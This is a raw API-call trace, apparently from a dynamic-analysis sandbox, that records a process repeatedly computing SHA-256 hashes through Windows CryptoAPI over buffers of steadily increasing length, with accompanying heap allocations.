	[0187.446] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.447] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.447] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0187.447] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.447] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f558
	[0187.447] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f558, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f558, pdwDataLen=0x128aac) returned 1
	[0187.447] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.447] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.447] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.447] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.447] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0187.447] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.447] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f580
	[0187.447] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f580, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f580, pdwDataLen=0x128aac) returned 1
	[0187.447] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.448] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.448] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.448] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.448] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0187.448] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.448] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f5a8
	[0187.448] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f5a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f5a8, pdwDataLen=0x128aac) returned 1
	[0187.448] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.448] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.448] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.448] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.448] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0187.449] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.449] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f5d0
	[0187.449] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f5d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f5d0, pdwDataLen=0x128aac) returned 1
	[0187.449] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.449] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.449] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.449] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.449] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0187.449] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.449] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f5f8
	[0187.449] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f5f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f5f8, pdwDataLen=0x128aac) returned 1
	[0187.449] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.449] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.449] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x272d4d0) returned 1
	[0187.449] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x272d4d0
	[0187.449] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.450] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.450] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0187.450] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.450] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f620
	[0187.450] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f620, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f620, pdwDataLen=0x128aac) returned 1
	[0187.450] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.450] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.450] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.450] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.450] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0187.450] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.450] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f648
	[0187.450] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f648, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f648, pdwDataLen=0x128aac) returned 1
	[0187.450] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.450] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.450] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.451] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.451] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0187.451] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.451] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f670
	[0187.451] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f670, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f670, pdwDataLen=0x128aac) returned 1
	[0187.451] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.451] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.451] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.451] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.451] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0187.451] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.451] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f698
	[0187.451] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f698, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f698, pdwDataLen=0x128aac) returned 1
	[0187.451] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.451] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.451] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.452] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.452] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0187.452] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.452] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f6c0
	[0187.452] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f6c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f6c0, pdwDataLen=0x128aac) returned 1
	[0187.452] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.452] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.452] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.452] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.452] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0187.452] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.452] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f6e8
	[0187.452] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f6e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f6e8, pdwDataLen=0x128aac) returned 1
	[0187.452] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.452] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.452] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.453] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.453] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0187.453] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.453] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f710
	[0187.453] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f710, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f710, pdwDataLen=0x128aac) returned 1
	[0187.453] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.453] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.453] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.453] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.453] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0187.453] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.453] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f738
	[0187.453] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f738, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f738, pdwDataLen=0x128aac) returned 1
	[0187.453] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.453] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.453] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.454] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.454] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0187.454] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f760
	[0187.454] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f760, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f760, pdwDataLen=0x128aac) returned 1
	[0187.454] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.454] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.454] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.454] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.454] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0187.454] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f788
	[0187.454] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f788, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f788, pdwDataLen=0x128aac) returned 1
	[0187.454] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.454] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.454] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.455] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.455] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0187.455] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f7b0
	[0187.455] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f7b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f7b0, pdwDataLen=0x128aac) returned 1
	[0187.455] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.455] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.455] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.455] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.455] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0187.455] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f7d8
	[0187.455] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f7d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f7d8, pdwDataLen=0x128aac) returned 1
	[0187.455] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.456] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.456] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.456] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.456] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0187.456] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f800
	[0187.456] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f800, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f800, pdwDataLen=0x128aac) returned 1
	[0187.456] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.456] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.456] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.456] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.456] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0187.456] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f828
	[0187.456] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f828, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f828, pdwDataLen=0x128aac) returned 1
	[0187.457] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.457] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.457] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.457] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.457] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0187.457] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.457] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f850
	[0187.457] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f850, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f850, pdwDataLen=0x128aac) returned 1
	[0187.457] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.457] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.457] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.457] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.457] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0187.457] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.458] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f878
	[0187.458] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f878, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f878, pdwDataLen=0x128aac) returned 1
	[0187.458] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.458] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.458] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.458] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.458] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0187.458] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.458] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f8a0
	[0187.458] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f8a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f8a0, pdwDataLen=0x128aac) returned 1
	[0187.458] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.458] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.458] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.458] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.459] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0187.459] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.459] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f8c8
	[0187.459] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f8c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f8c8, pdwDataLen=0x128aac) returned 1
	[0187.459] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.459] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.459] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.459] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.459] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0187.459] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.459] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f8f0
	[0187.459] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272f8f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f8f0, pdwDataLen=0x128aac) returned 1
	[0187.459] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.459] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.459] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.460] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.460] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0187.460] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.460] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f918
	[0187.460] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272f918, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272f918, pdwDataLen=0x128aac) returned 1
	[0187.460] CryptDestroyHash (hHash=0x22b6840) returned 1
